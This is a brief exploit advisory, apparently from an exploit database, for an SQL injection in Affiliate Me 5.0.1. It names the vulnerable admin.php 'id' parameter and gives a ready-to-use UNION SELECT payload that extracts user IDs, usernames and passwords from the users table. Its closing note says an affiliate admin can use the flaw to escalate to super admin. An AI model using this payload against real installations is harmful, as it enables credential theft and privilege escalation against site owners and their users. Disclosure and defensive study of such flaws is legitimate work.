<pre><code>[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection<br />[#] Exploit Date: May 16, 2023.<br />[#] CVSS 3.1: 6.4 (Medium)<br />[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br />[#] Tactic: Initial Access (TA0001)<br />[#] Technique: Exploit Public-Facing Application (T1190)<br />[#] Application Name: Affiliate Me<br />[#] Application Version: 5.0.1<br />[#] Vendor: https://www.powerstonegh.com/<br /><br /><br />[#] Author: h4ck3r - Faisal Albuloushi<br />[#] Contact: SQL@hotmail.co.uk<br />[#] Blog: https://www.0wl.tech<br /><br /><br />[#] 3xploit:<br /><br />[path]/admin.php?show=reply&id=[Injected Query]<br /><br /><br />[#] 3xample:<br /><br />[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -<br /><br /><br />[#] Notes:<br />- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.<br /></code></pre>